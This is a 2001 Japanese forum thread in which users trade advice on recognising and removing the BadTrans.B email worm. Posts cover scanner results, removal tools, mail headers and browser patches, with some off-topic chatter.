アメリカにいる後輩からメールがきた。
タイトル Re
本文なし
添付 HAMSTER.DOC.zlo

ウイルスかな
634名無しさん@お腹いっぱい。:01/12/07 21:04
>>633
ZAが検疫してるね。
635ネット屋 ◆.t4dJfuU :01/12/07 21:06
>>629-630
いえいえ、自分自身かなり勉強になっています。スキルアップの良い機会です。
>>633
一番最後の「zlo」は間違いないですか?
シマンテックの方のウィルスチェックをかけてみると、何かわかるかも知れません。
636東海女:01/12/07 21:22
>>632
どうもありがとう。
やはり感染してました。1のシマンテックでオンラインスキャンしたところ
Macro.srcに2ファイルやられてました。

レスキューDISKは、マカフィーの最新版になっていませんでした。
DAT4173、エンジン4140です。
GONERは、4174、4140で対応だったので、ダメでしょう。

削除したいので、とりあえず3から実行でよいのでしょうか?
何度も教えてちゃんですみません。
友人には即電話し(何も対策していない・・・)メールじゃなくて
電話連絡にしてもらいました。びっくり仰天してました(!)
まさか自分の名前でウィルスがばらまかれているとわ・・・
こっちがうわわわ〜んん、なんですけどね・・・
637名無しさん@お腹いっぱい。:01/12/07 21:41
>583
おまえも 女には やさしいやん
638名無しさん@お腹いっぱい。:01/12/07 21:53
>>636
Gonerに感染している恐れがあるの?
ウイスルスキャナーに悪さするのでマカフィーを使い続ける/捨てるの如何にかかわらず退治しないといけない。
Gonerスレにシマンテックの駆除ツールが紹介されていたと思うのでチェックする。
639九州男 ◆8U2HuhRg :01/12/07 21:53
>637
当たり前・・・
640名無しさん@お腹いっぱい。:01/12/07 22:27
お願いいたします。
どなた様か、初心者でもBADTRANS.Bの怖さがわかるサイトをお教え願えませんでしょうか。

お友達が感染したメールを送ってきたので駆除するよう電話したところ、
『誰にも迷惑かけてないからいいじゃない』の一言で一蹴されてしまいました(涙
どんなに迷惑かを説明したところ、『メール使わなきゃいいんでしょ?』(彼女は常時接続)
Webサイトを見てもうつしてしまうと(端的ですが)脅しても
『それってヘンだよ〜』と取り合ってもらえず、
四の五のぬかさず駆除しろ、と言えば『やりかたわかんない』。
ファックスで1の説明を送っても『難しい』で終わりました(涙
どうもやるきがないだけのようなので、がつん!と脅して駆除させたいのです。
メールが出来てインターネットで遊べる程度の彼女にもわかるサイトがありましたら
教えていただけませんでしょうか。m(__)m
642名無しさん@お腹いっぱい。:01/12/07 22:39
はっきり言えばBADTRANS.Bはさほど怖くないんではないかと。

ただ、これに感染したってことは、
もっともっと怖いウィルスに感染する可能性がある、
というところが怖いんじゃないかな。
不謹慎かも知れないけどやっぱり一度素人にもわかりやすい
破壊活動をするウィルスが流行らないとダメなような気がする。
>640
コピペ?それとも同じような言動の初心者が多いの?
>>610に図解説明ページのurlがあるじゃん。
パスワードもなんもかんもダダ洩れになるらしいよ、詳しくはここ見れって
送ってやれば?
貴方のお友達のような方はおそらく「人に迷惑かかるよ」では動かなくても
「あんたヒドイ目に会うよ」なら動くと思われ。
645名無しさん@お腹いっぱい。:01/12/07 22:44
>>618
そうそう,うちに来たのも From のアドレスは知人(nifty 在住)
のだが,メールの経路が aol.com から始まってた。
646 :01/12/07 22:53
>>645
aol.comの直後の( )の中を見てください。
647名無しさん@お腹いっぱい。:01/12/07 22:52
>>641
やっぱりここですか。ここが一番ですね。(w
>>1->>9をプリントアウトしてファックスするよりこのアドレス教えた方が
早かったかしらと思っています。

>>642
そうですね。
もっと怖いウイルスもあるんだよと彼女に教えてあげようと思います。

レス有り難うございました。
>>647
若し、まだ彼女が対策してないなら、コレの怖さ理解できる
いたづらメールの作り方、教えたげようか(w

でも、方法解ると小学校高学年でもできるから止めた。。。。
それだけ怖いのよん。とんでもないもん添付したら最悪。
649東海女:01/12/07 22:58
>>638さん
レスありがとう。
BADTRANS.B,GONER(Hiメール)じゃないみたい・・・
駆除ツーるでは、NOT FOUNDでした。
でも、シマンテックのWEB上では、WINのテンポラリーインターネットファイルの
コンテンツの×××ファイルは、次のウィルスに感染しています、と出ます。
それが、「Macro.src」なんです。面倒だからこのフォルダごと削除?とかも
思ったんですが、WIN壊れそうな気もするんです。
マカフィーでもシマンテックでもそんな名前のウィルスはなかったので。
じゃ新種?亜種?・・・解析依頼してこよう。
それか、明日1日かけて、やっぱ5回目のOS初期化かなぁ(><)
(マカダメで4回OS初期化したので、もうそういうのはやめたいです・・・)
650645:01/12/07 22:59
>>646
()なんてないよ。すぐ,by になってる。
651646:01/12/07 23:04
>>650
あれ〜?
うちのは全部…と思ったら確かにそういうのも2通あるな…
652645:01/12/07 23:06
ちなみに,普段,その From アドレスの人から来るメールの経路の最初は,その人が
設定したであろうホスト名になってる。
653東海女:01/12/07 23:13
>ALL
何度もすみません。
スレ違ってきましたので質問スレに移動します。
レスくださったかた、ありがとうございました。
精神的に安心できました。まだ何も解決できてませんが
ありがとうございました。
>>649
セキュ板のどこかのスレにmacro.srcのソースがコピペされていたから
そいつのキャッシュにシマンテックオンラインスキャンが反応したと思われ。

フォルダごと消すのはまずそうなので
ツール−インターネットオプション−インターネット一時ファイル ファイル削除
ついでに
                −履歴 履歴のクリア

OS初期化に慣れているのならマカフィー上書き作戦を試せ。
ダメならOS初期化ね。
655>645:01/12/07 23:35
メールヘッダーを張り付けてください。
自分のメールアドレスは削除してください。
656名無しさん@お腹いっぱい。 :01/12/07 23:35
W32.Badtrans感染してた(鬱)
657645:01/12/07 23:58
>>655 なんで?
658東海女:01/12/08 00:46
>>654
無事クリアできました。
マカフィーもシマンテックもOKになり
キレイな身でこれから眠ることができます。
レスくださった方、またコテハンでうざかったでしょうが
見逃してくださった方、本当にありがとうございましたm(__)m
2ちゃんねらーであったことがこんなにうれしかったことは
ありません。それでは、失礼して休みます。
わかるかと。
660406:01/12/08 03:56
>>428
情報無いですよね。
検索してみたんですが見当たらなくて。

>>432
プロバイダに聞いてみたところ、、
「有料のサービスを契約してない限り、
自動的にウィルスを駆除するようなことはない」というような返答でした・・・。
661645じゃないけど。:01/12/08 03:56
>>618
マジですか。
家、こんなん来たんですけど。

1通目。

>送信元: "******" <_******@d*.dion.ne.jp>
>送信先: ********@nifty.ne.jp
>件名: Re:
>Return-Path: ******@d7.dion.ne.jp
>Date: Thu, 6 Dec 2001 21:25:07 +0900 (JST)
>送信元: Norton AntiVirus 電子メール保護

2通目。

>Return-Path: <******@d*.dion.ne.jp>
>Delivered-To: ******@a*.shes.net
>Received: (qmail 698 invoked from network); 7 Dec 2001 23:23:11 +0900
>Received: from unknown (HELO dsmtp10.dion.ne.jp) (210.196.3.102)
> by a*.shes.net with SMTP; 7 Dec 2001 23:23:11 +0900
>Received: from aol.com by dsmtp10.dion.ne.jp (8.9.3/3.7W-01070516)
> id XAA16167; Fri, 7 Dec 2001 23:23:01 +0900 (JST)
>Date: Fri, 7 Dec 2001 23:23:01 +0900 (JST)
>送信元: Norton AntiVirus 電子メール保護

>Norton AntiVirus が以下の電子メールメッセージを削除しました。 理由は次のウィルスが感染していたためです:

>送信元: "******" <_******@d*.dion.ne.jp>
>送信先: ******@a*.shes.net
>件名: Re:

相手に心当たり無し。
プロバイダのアドレスを二つ知っていると言うことは、友達の可能性もあるかも。
だけど実は、この前日に、知り合いからもこの二つのアドレスに届いてる。
うーん・・・。
662名無しさん@お腹いっぱい。:01/12/08 05:29
protocol.dllを解読したらアドレス帳からは自分の別アド(一番上だから?)
だけで、他は全部閲覧したサイトの管理人だったんだけど、
少なくとも友達には送ってないって安心してもいいのかな?
(protocol.dllに載ってない=送ってない?)
問題は管理人組の一人が大学の先生で、警告しとくべきかってことなんだけど。
ウィルスは大抵バグ持ちです。どこまで信用して良いのやら・・・MS並(w

とはいえ、これだけ流行っているウィルス。チェーンメールもどきにならぬよう、
「何か言われたら謝る。」くらいで良いのでは?>>662
664名無しさん@お腹いっぱい。:01/12/08 05:50
>>663
即レスどうも。
つまりログになくても送っちゃってるかもしれないってことか・・・
言われたら謝ります。(もう友達数人には携帯で知らせちゃったけど)
665名無しさん@お腹いっぱい。:01/12/08 09:29
Norton先生に
OEの送信トレイ.dbxに[email protected]
感染してますって言われたんだけどやばい?
A型だったらスレ違いかもしれんが。
ちなみにOEは使ってないです。
666名無しさん@お腹いっぱい。:01/12/08 10:43
gooのフリーメールに「Me_nude.MP3.sc」という添付ファイル付きHTMLメールが来ました。
メールの本文の部分だけ見たんですが、これだけでも感染してしまうのでしょうか?r
667ネット屋 ◆.t4dJfuU :01/12/08 11:43
>>660>>665
[email protected]」についての記載ですが、
http://www.symantec.com/region/jp/news/year01/011206b.html
によると、11月の感染報告順位として
1位:W32.Badtrans.B@mm(バッドトランス)
8位:[email protected](バッドトランス)
となっていますね。なのに、「[email protected]」についての記載がない。
まるで同じと考えていいのかなぁ?
668ネット屋 ◆.t4dJfuU :01/12/08 11:54
>>664
今のところProtocol.dllに無いところに「送った証拠」も「送ってない保証」
もないようですね。専門のサイトによると、「送ったら書く」にはなっている
ようですが。
>>665
OEを使っていないのに、OEの受信トレイ.dbxが感染?なんだろう?
「使っていない」と言うのは「使ったことが一度もない」であっていますか?
>>666
誰もはっきり断言できません。チェックしてください。
669名無しさんに接続中…:01/12/08 12:06
>>665

OE使ってますが、同じくノートンに警告だされました。
完全削除しました。(ノートンで)
670645:01/12/08 12:20
>>659
>>661 と同じように,経路の最初が aol.com になっており,From は知人の
アドレス+_,Subject は Re: + 意味不明の2バイト文字3つで,その他は
特別なことはないと思います。
ウィルスが発信ホスト名を指定しているだけかも。
知人のマシンが本当に感染しているかは,連絡取れず不明。
671665:01/12/08 12:26
>668
ありがとうございます。
OEは一週間前までは使っていましたが、
別のメーラーに乗り換えた後こっちは
初期状態に戻してました。
[email protected]じゃなくて
W32.Badtrans@mmだったかも…
同じ症状の人いるならもういいや。ども
へたれてるな
673 :01/12/08 14:11
OEアンインストールしたら?
674名無しさん@お腹いっぱい。:01/12/08 14:14
うへぇ、さっき受け取った10通のメールの半分がBadtransだ・・・
自然科学関係のMLに2つ入っているんだけど、それぞれから半分ずつ来ているよ!
10日以上前に何人かがMLで警告しているのに、一向に減らないどころか増えてきて
いるような気がする。
あんたら知的レベルは高いはずなんだから、いい加減なんとかしろよと言いたい。

ちょっと切れ気味 
675名無しさん@お腹いっぱい。:01/12/08 15:00
足がくさいんです。これもウィルスのせいでしょうか。
>>675
ウイルスっていうより、カビかと。
>675
足が臭いのは、細菌のウンコです。
外から帰って来たら足を洗うようにし、その後すぐ
酢を大さじ1〜2杯入れた水に5分ほど足をつけるようにすると良いでしょう
水虫の予防にもなります
あと10円玉を脱いだ後の靴の中に入れておくのも良いです

そういうわけですのでこのテの質問はもうナシYO!
678名無しさん@お腹いっぱい。:01/12/08 16:19
参考にさせてもらっています。
今日になってまた不信メールがきました。
改めて確認したいのですが、どなたかレスお願いします。

先日はあきらかにBadtransと分かるメールだったのですが
今日のメールは差出人名は心当たりがない人で
件名はRe:のみ。添付ファイルなしです。
ヘッダからは、aolを経由しているみたいです。
送信者のメールアドレスの先頭には_もついています。
これってウイルスと見ていいでしょうか。
もちろん開封してません。
679ネット屋 ◆.t4dJfuU :01/12/08 16:23
>>678
とにかく、
http://security2.norton.com/ssc/lunavbrk.asp?scantype=2&langid=jp&venid=sym&plfid=20&pkj=DDSKYJDMVVOOAOMMUZY
をお勧めします。感染はしていないでしょうけれど、保菌状態かも知れませんから。
680無責任発言:01/12/08 16:26
添付がなければ平気なんじゃない?
681678:01/12/08 16:32
ネット屋さん、ありがとうございます。
まずはオンラインスキャンですね。
では早速。逝ってきまーす。
682名無しさん@お腹いっぱい。:01/12/08 16:46
っていうかHTML形式辞めろよな(w
ネスケで助かった…
684名無しさん@お腹いっぱい。:01/12/08 17:21
昨日、感染した友達からバラまかれたメールを開いたとき、
本文に一瞬だけ文字が現れて、0.5秒くらいでサっと消えてしまいました。
その内容を本人に言ったら、それは自分宛に来てた友達からのメールの文章だと
言っていました。こんなことってあるんですか?
一応、私はウイルス感染しなかったんですが、心配でIE6にしたとたん
PCの起動が遅くなり、ブラウザが立ちあがるまで20秒くらいかかるようになり
フリーズが多くなりました。いろんなウイルスチェックしたけど
どれも大丈夫だったのに、これだけ具合悪いと不安になる。再セットしたら直るかな?
685名無しさん@お腹いっぱい。:01/12/08 17:23
ちょっと教えて頂きたいのですが
今回のこのBadtrans.Bでは
○すべてのウィンドウ内のテキストをログに記録する
○ログファイルをワームファイルに含まれているアドレスリストの1つに送信する
とシマンテックのページにありました
このログファイルという部分はこのワームに感染する前に記録されたログも
含まれているものなのでしょうか?
686ネット屋 ◆.t4dJfuU :01/12/08 17:42
>>684
小さい四角形が現れて消えたのですね?そのときもIE6でしたか?
また、PCが遅くなる件ですが、McAfee使っています?
>>685
そら、ねっす。感染中だけです。キー入力の盗み見ですので。
687名無しさん@お腹いっぱい。:01/12/08 17:43
数日前、受け取った「RE:RE:文字化け」のウイルス添付メールに、
知り合いだったような気がして、軽く自己紹介して「どなたでした
っけ?」と返信(もちろんただのテキストメールで)したら、前のと
同じメールアドレスからの送信で、今度は「RE:RE:RE:文字化け無し」
のウイルス添付メールが送られてきました。

Badtransは同じアドレスには1通しか送らないはずなんだから、
相手の人は、駆除後に再び感染したか、非難されたとでも思って
ウイルスを手動で送ってきたか...ですよね。
なんかイッソ笑えてしまいました。
688ネット屋 ◆.t4dJfuU :01/12/08 17:48
>>687
ウィルス添付メールに対し、単純に「返信」出来ましたか?
メールアドレスの頭に「_」が入っているはずなので、BADTRANS.Bだった場合、
返信だけでは出来ないはずなのですが。
また、未読メールにはチェックナシに送信するようですよ。
689685:01/12/08 17:54
>>686
ありがとうございました
もう一つあるんですが
このワームによってクッキーファイル自体を読み込みそれを送信するという
報告または可能性はあるのでしょうか?
690687:01/12/08 18:02
>>688
はい〜。モチロン先頭のアンダーバーを取っての返信です。
何百と来てるんでイチイチ返信はしないんだけど、
それはちょっと気になったんで返信してみたのでした。

> また、未読メールにはチェックナシに送信するようですよ。
ああ、すると、相手の方はここ数日メールを読まないでいて、だから
また来たのかな? 「RE:」が1個増えてたんで謎だったんです。
691ネット屋 ◆.t4dJfuU :01/12/08 19:13
>>689
聞いてないです。多分、ないです。
>>690
そうですね、相手が未読にして置いておいた間に、ウィルスが送信したのでしょう。
692684:01/12/08 21:19
>>ネット屋様様

>小さい四角形が現れて消えたのですね?そのときもIE6でしたか?

違います。感染してる子宛に来てた他人からのメールが、チラっとだけ
私の画面にうつったんです。ほんの数秒でした。添付ファイルはtextのみで
バイトで、それ以外は何も添付されてませんでした。そのときはIE5 SP2でした。

>また、PCが遅くなる件ですが、McAfee使っています?

使ってないです。なんか今日も1日、PC事態不安定で、2回もフリーズしました。
頻繁に「モジュール違反」とかゆうのも出ます。PCとIE6が
合わないとかそんなことありますかね?もう1回5に戻そうかな…(;^_^A
693こんな症状もあるの?:01/12/08 22:32
Badtransに感染し、その後シマンテックのサイトから駆除ツールを使って
駆除した後、ノートンアンチウィルス試用版をインストールした。
そうしたらメールパスワードが認証できなくなりました。
ブルー。
これは病状なんでしょうか?それともその後の駆除&インストールという
PCに負担重そうな事やったからどっかこわれたんでしょうか・・・・。
はあ・・・。
694ななしさん:01/12/08 22:53
IEのパッチですが、雑誌の付録かなにかで
入手は可能ですか?
>>694
基本的には収録されません。
696ネット屋 ◆.t4dJfuU :01/12/08 23:05
>>692
メールは開いたのかしら?わたしも感染したとき、小さい四角が、0.05秒
出ました。そのときは、IE5.5+SP1でしたので、感染して当然なのですが。
病気のチェックは、両方やりましたか?シマンテックの方をお勧めしますよ。
また、HDDに空き容量は十分ありますか?OSは?
>>693
FAQにありますよ。>>9
何件か同様の障害報告がこのスレ(過去含む)にありました。
697M:01/12/08 23:37
W32.Badtrans.B@mm
698名無しさん@お腹いっぱい。:01/12/08 23:38
どうも ネット屋さん お疲れさまです
ML関係なんですが どうも Reply-To ではなく Fromに対して返信するみたいですよ
個人宛に来ます。
おれの投稿 読まれてないってこっちゃな
返事がウイルスかい。。鬱
699名無しさん@お腹いっぱい。:01/12/08 23:51
 W32.Badtrans.B@mm はウイルスバスターのデフォルト設定(感染しそうな
ファイルのみ詮索)では検出されないのじゃあないですか。「総てのファイル
を検索」に設定しなおさなくては。2−3日前の話題ですが。
 私にもウイルスとしか考えられないメールが多数届き、IEにディスク
保存を求められて保存(W2000とIE6使用)、ウイルスバスターに
かけてみたが陰性、しかしどう考えてもウイルスだと思い調べたら
「総てのファイルを検索」する必要があることを知りました。
 なおメールをダウンロードしただけでは、それでもウイルスバスターは
検出せず、検出して貰うにはファイルとして保存しなくてはなりません。
700ファルコン:01/12/09 00:10
うちしまんてっくでしたが、メール受信後即検知削除してくれました。
毎週更新してるかいがあるってもんだ。
SP2だしね。
ちゃんとアップデートしましょうよ。
701およよ!:01/12/09 00:16
702名無しさん@お腹いっぱい。:01/12/09 00:26
ウチのパソのバージョン情報見たら
SP1;240308;q231452;
ってなってるんですけど、これってやばいのですか?
703阪京:01/12/09 00:31
"Badtrans.B"が来てから、ふと気づくと、メールの受信が不可能に。
送信はできるが。
別のPCで受信できるので致命的ではないものの。
感染はせずに隔離したはずなのに。シマンテックのもトレンドマイクロのも
駆除ツール実行しても検出されず。元々NAVが最新で入っているのに。
なんでかよーわからん。
704名無しさん@お腹いっぱい。:01/12/09 01:01
>>702
それだけじゃバージョンがいくつのSP1かわかんないだろ。
こっちのIE6はパッチ当ててQ306121;Q312461だ。
705名無しさん@お腹いっぱい。:01/12/09 01:08
IE5.5 SP2を↓しようとすると、タスクスケジューラの署名を確認しています
のところでこけてしまい(回線が遅いんじゃゴラァとかいわれ)、何度やっても出来ません。
とりあえず、MS01-020をあてとけば大丈夫ですか
>>703
このスレのFAQぐらい読みなさい。
>>9の症状に心当たり無いか。
>>705
駄目です。5.01と5.5ならSP2にして下さい。
708ホームページ開設者:01/12/09 02:12
Badtrans.Bはいつまでつづくんだ。おい。ヽ(`Д´)ノ
ええかげんにせーよ。

きっと来年も毎日40KBが何通も届んだろうな。
スパムよりたくさんくるウイルスは初めてだよ。
ほんといつまでがまんしたらいいの?
709名無しさん@お腹いっぱい。:01/12/09 03:09
年賀メールもBadtrans.Bで年明けになりそうだね。(笑)
710名無しさん@お腹いっぱい。:01/12/09 04:13
おっ!やっと[email protected]が話題に出てきた〜♪

これ来るとノートンが色々違う反応を見せてくれるんだよね。
ちなみに、「警告(ウィルスは削除されていません)」だったかが
とてもウザイ!
オプションで「修復できなければ検疫」にしないと、タスクトレ
イにアイコンが貯まっていくの俺だけ?(XP)
2001に「自動で削除」みたいなオプション復活希望、2001でも
Windows2000は自動削除できなかったようだけど、システム的に
無理なのかな?
711名無しさん@お腹いっぱい。:01/12/09 04:47
>>670
>>経路の最初が aol.com になっており

うちに来てる数十通も、ほとんどそれです。
偶然にしては多すぎると思うのですが、
どういうことなんでしょうか?
当のaolは何か言ってないのかな?
712名無しさん@お腹いっぱい。:01/12/09 07:33
>>710
同じ〜
あれって1通のメールから2種のウイルスが検出されることで
出てしまう不具合のような。どうなんだろう。
713ネット屋さん宜しくお願いします:01/12/09 08:08
ガイシュツだったら、スマソ。
パソコンメーカーお勧めのマカフィ(ウイルススキャンオンライン)で、
スキャンしたところ、感染しているファイルはなしと出ます。
しかし、怪しげなメール(ファイル付き、本文白紙)をアウトルック上で、
削除しようとしても、「不正な処理を行ったので強制終了されます」のメッセージ
が現れて削除出来ません。どうすれば良いのでしょうか?
また、ウイルスとは無関係かも知れませんが、Microsoft active channnelの画面や
チャンネルスクリーンセーバーの表示が頻繁に現れ、操作に支障を来して困っています。
これらが出ないようにするにはどうすれば良いのでしょうか?
>>713
マカフィーがらみはこっちの方々がくわしいかも。

「マカフィーってだめなの!PART2」
http://pc.2ch.net/test/read.cgi/sec/1007480057/
715ネット屋 ◆.t4dJfuU :01/12/09 10:17
>>698
なるほど。ウィルスはReply-toを見ずに、Fromにメールを出すと。
すると、ML宛に送信されるウィルスはなんなんだろう?
>>705
JavaScriptとActiveXを切っていませんか?
http://security2.norton.com/ssc/faq.asp?j=1&langid=jp&venid=sym&plfid=22&pkj=TFTGVYRMHCGVRVRMNRY
を参考にして両方有効にして「セットアップを再実行」してみてください。
それでもダメだった場合、中途半端にダウンロードされているファイルを削除して
再度実行してみてください。ハードディスクは足りてますよね?あるいは病気以前の
問題で、ハードディスクかOSがやばいかも?何回かやってダメだった場合は下記参照。
http://www.microsoft.com/japan/support/kb/articles/J048/9/02.asp
>>713
強制終了は>>8かな?
その他Windowsの一般的な話は、すいません、他のスレでお願いします。
716名無しさん:01/12/09 10:22
新着メールが39通もあったので変だ思ったら
35通が「Re:」だたっ。どうしょう?
717名無しさん@お腹いっぱい。:01/12/09 10:39
10日以上立っているのに全然下火にならないなぁ

簡潔なBadTrans感染者へのメールのテンプレート作らない?
感染した知人と電話で話したんだけどいろいろなリンクとか貼っていると、
どうも分かりづらいみたい

1.BadTransの簡単な説明およびリンク一カ所
2.駆除ツールの案内(一カ所)
3.今度の対策について
4.SP2,IE6にできない人へのOutlook Expressの推奨設定 ※

※ Outlook Expressなんて使うなゴルァ!は初心者属性の人にはなかなか通用しない
>>717
とりあえず、トレンドマイクロの対策Webを教えておけば
いいんではないかと。
http://www.trendmicro.co.jp/badtrans/
719名無しさん@お腹いっぱい。:01/12/09 11:28
サンクス、ここのURL教えるだけでいけるな
しかし、SP2やIE6にできないという相談も多いけど、アナログ回線じゃ無理だなぁ
セキュリティパッチだけないのかな
720名無しさん@お腹いっぱい。:01/12/09 12:34
>719
自分は、マイクロソフトのサイトが感染した事件の後に
恐怖を感じて速、SP2にしました。それもアナログ回線で。
感染して他の人に迷惑をかけては大変だ!!と必死でした(;´Д`)
何時間もDLに時間が掛かって、正直泣き出しそうでした。
>>719
パッチだけ当てたいなら下のURLなんだけど……
http://www.microsoft.com/windows/ie/downloads/critical/q290108/default.asp
「英語だからわかんなーい」と言われるのがオチなので、
他のセキュリティホールや不具合をまとめて埋めてくれるSP2を黙って
やらせるのが一番簡単。
722名無しさん@お腹いっぱい。:01/12/09 12:54
>>711
実は、インターネット歴はふっるいくせにウィルスは受け取ったことないんです。
あ、coderedは検知したけど、影響なし。
だから、憶測で悪いのですが、

それってもしかして
aolとdocomoがいっしょになったからかなー。
nifytも、統合したinfoweb.ne.jpだったりするから。
>>719
MS01-020
但し、適用するにはSP1適用済みが前提。
SP、SP騒ぐ前に、少しぐらいはバグの情報自分で探してもらいたい。
この癖付けないと、新しい脆弱性利用したVIR出る度大騒ぎの繰り返し。

レス1発で解決できても所詮その場しのぎ。
・・・・初心者はいつまで経っても免疫つかない。
724名無しさん@お腹いっぱい。:01/12/09 13:03
>715
そういや そうですね<MLの件
で、調べたら BはMLには流れてませんでした。

その前の peace って本文のやつ whatever.exeが添付されてるやつは
MLに流れていました。
725ぱじゅ:01/12/09 13:09
うちのママさんが私の知らない間にメールを開いたかなんかで、
うちのコンピューターのシステムファイルにKernel32.dllが
存在します。
  シマンテックのとこで駆除プログラムをDLして
実行したんですけど、W32.Badtransウィルスは見つかりません
でしたと出ます。

  これって感染してないってことですか?誰か教えて下さいまし〜
>>725
このスレとか関連サイト、ちゃんと読んでないね。

あっちゃ駄目なのは「kernel32.exe」という「ファイル」。
kernel32.dll、削除したいならしてもいいけど、あとで泣かないように。
>>725
感染していないとは言い切れないが、
kernel32がついていてもdllは本来的なファイルで、
ウイルスが作るのはkernel32.exe。
728 :01/12/09 13:29
しかも>>725は初級ネット板にも同じ質問を。
729阪京:01/12/09 13:41
>>706
ご指摘ありがとうございます。でも症状は少し違いますね。アカウントを再設定すれば
いいのかもしれないけど、パスワードの通知書がみつからない。結局、Outlook2000
はやめて、Outlook Express 6に替えてしまいました。
730阪京:01/12/09 13:43
追伸:久しぶりにメルとものおねーたまからメールが来たと思ったら
"Badtrans.B"4連発でした。爆笑。
731名無しさん@お腹いっぱい。:01/12/09 13:52
同じ人から何度も来るのはどういうこと?
アドレスから若い女性と思われるので、
教えてあげたほうがいいのかな。
ふとおもった。
kernel.dll.exeなんてウィルスが出たら、初心者は死にまくるな。きっと・・・
733名無しさん@お腹いっぱい。:01/12/09 14:18
ウイルスの駆除後にkernel32.exeっていうフォルダ(中身はカラ)が
見つかったんですけど、これはウイルスの名残ですか?
また、念の為消したほうがいいんでしょうか?
既出だったらすみません
734名無しさん@お腹いっぱい。:01/12/09 14:23
サイバーテロ?にあった痛い議員ハケン!
http://kaba.2ch.net/test/read.cgi/net/1007372567/l50
http://www.ss-project.com/
>>733
説明書読まずに家電製品使うタイプだろ、アンタ。
736名無しさん@お腹いっぱい。:01/12/09 14:35
>735
性格ワリィなお前。
737名無しさん@お腹いっぱい。:01/12/09 14:38
>>733
このスレの70番代を読むべし。

>>735
こんくらい教えてやれや
>>722
ここまで多いとaol.comは作者の意図かと。
739九州男 ◆8U2HuhRg :01/12/09 14:45
>733
ウチの彼女と同じかよ!
もう一回駆除ツールの説明読もうね(w
740名無しさん@お腹いっぱい。:01/12/09 15:06
>733
死ぬほど既出だけど、それは削除ツールが作ったフォルダ
フォルダ名と同一の名のファイルを同じフォルダ内に作れないという仕様を
利用した再感染対策
741阪京:01/12/09 15:06
>>731
実メアドとWebメールによる捨てメアド(↑)と携帯のメアドを知らせていた
ので、それぞれに来たわけです。携帯とWebメールは即わかりましたが、
前日に知人から来た"Badtrans.B"により実メアドは受信不能になっていたので、
翌日、別のPCでチェックして2通来ていたことがわかったというわけです。
もちろん携帯と捨てメアドに来ていた段階で知らせました。
742名無しさん@お腹いっぱい。:01/12/09 15:07
FAQまとめたページ作って、定期的にここ見ろ!としたほうがいいかしら
743ネット屋 ◆.t4dJfuU :01/12/09 15:23
>>733>>737>>739-740
うみゅ。既出だ。理屈の詳細は前スレ
http://pc.2ch.net/test/read.cgi/sec/1007075829/122
で書いたっすね。
>>742
トレンドマイクロも削除ツールのバージョンをナニゲにUPしてたり
するっすね。既に今の>>1-9とはちょっと違っている。更新が大変かも。
最近質問が減ってきているのは、このスレが役に立っているのか、
下火になってきたのか、判らないけど。
744名無しさん@お腹いっぱい。:01/12/09 16:17
話題に上がっててもOEユーザーじゃないから大丈夫とタカをくくって
いたら、やってきました。
ノートン先生のおかげで助かったけど、怖いからメールごと削除。
文字化けしていたので誰からだったか確認もしてなかった。
いったい誰からだったのだろう・・・。
それ以来、用心してサーバーに同期をとってから受信するようにしています。
テキストを見るだけだったら大丈夫だったんですかね。
745名無しさん@お腹いっぱい。:01/12/09 16:23
>OEユーザーじゃないから大丈夫
なんかこういう人って遅かれ早かれウイルスにやられそう。
746名無しさん@お腹いっぱい。:01/12/09 16:34
そりゃ何使ってても来るだろうケド
IEでプレビューされるようなメーラーでなければ
添付ファイルが勝手に開かれる心配もないのだし
気にすることも無いのでは?
747名無しさん@お腹いっぱい。:01/12/09 18:48
JS_PLAY.Aってウィルスに感染してたんですけど
これはやりのやつですか?
748ネット屋 ◆.t4dJfuU :01/12/09 19:11
>>747
違うと思います。それって、単にパターンファイル名では?
http://www.trendmicro.co.jp/support/pattern/957.txt
749747:01/12/09 19:15
>>748
あ、そうなんですか。ありがとうございます。
トレンドマイクロのオンラインスキャンでかかって
トロイだのなんだの言われたものでちょい心配になってたんです。
750名無しさん@お腹いっぱい。:01/12/09 19:52
駆除ツールをやった後にできるkernel32.exeってフォルダって、
ウイルスに感染してない状態で駆除ツールを使った場合にも作られるの?
751名無しさん@お腹いっぱい。:01/12/09 20:32
>>707
了解しました

>>715
おおっ、ためしてみます。悪恥部Xや邪婆は通常きってます。
IE立ち上げないでやってたから関係ないものとばかり思ってましたが
可能性ありそうですね
>>750
やってみればわかるかと。
753ななし:01/12/09 20:57
>>720
おお!私も241分DL?ひーーーーーとか一瞬
思ったけどケーブルだったんで、20分ぐらい?ですんだよ。
DLでまた1日かけるかと思ったんでほんとうに良かった。
ただし常時接続だから、もっとセキュリティ意識を持たなくちゃ!
・・・カナーリ反省です。
754( ;´Д`)  :01/12/09 21:11
うちもやられた〜
Sorry_about_yesterday.MP3.pif (28KByte) がああああああ
755名無しさん@お腹いっぱい。:01/12/09 22:30
今このウィルスらしきメールが来たんだけど
IESP2ならプレビュー見ても大丈夫ですか?
756昨日の678:01/12/09 22:54
まずはネット屋さんにお礼を。
オンラインスキャンでは感染はなかったようでした。
ひと安心です。

その後も、じみに来てます<ウイルス
それが全部添付ファイルが表示されてないっす。
で、思ったんですが
正直、差出人が知らない人っていうのが助かってます(w
web上で公開しているアドレスに送ってくれてる模様。
個人用とweb用とアドレスを分けているので、
なんとなくだけど想像ついてます。
知ってる人なら開いてしまう可能性ありますよね。
一応、確認すると思いますけど。
あ、ちなみにweb用には転送メール使ってますです。
758名無しさん@お腹いっぱい。:01/12/09 23:34
対策済で感染はせんけど、
送られてくるのいいかげんにウザイんだけど、
なんとかならんかね・・・
759 :01/12/10 00:02
760 :01/12/10 00:03
 ようやく日に数通に落ち着いてきたみたく。
 はやいとこ収束してくれないと、年賀メールの未読Reで再蔓延
する予感。
762名無しさん@お腹いっぱい。:01/12/10 01:04
タイトル「Re:」で、全然知らない人から、サイト公開用のメルアド宛て(転送アドレス)へ
メールが来たんだけど、添付ファイルの表示はないみたい。
でも、容量が40KBって・・・。開けるのちょっと怖い〜。
これって開けても大丈夫なの?
763名無しさん@お腹いっぱい。:01/12/10 01:15
件名が「Net5 E-News」lという妖しげなメールが届きました。
発信者名が「Net5.FateOnline」で、突然何かをDLさせようとしたので
ビビってキャンセルボタンを押しておきましたが・・・自分の他にも、
このメール来た方いませんか?
新しいウイルスメール到来なのでしょうか・・・不安です。
764763:01/12/10 01:19
あ、一応「添付ファイル」が無かった事も書き加えておきます。
765名無しさん@お腹いっぱい。:01/12/10 01:28
>>762
ネタ?
766kernel32.exe:01/12/10 01:45
ハムスタ−とニュ−スがきた
メールでつがいのハムスター送られてきた。
768名無しさん@お腹いっぱい。:01/12/10 02:47
↓これってホント?

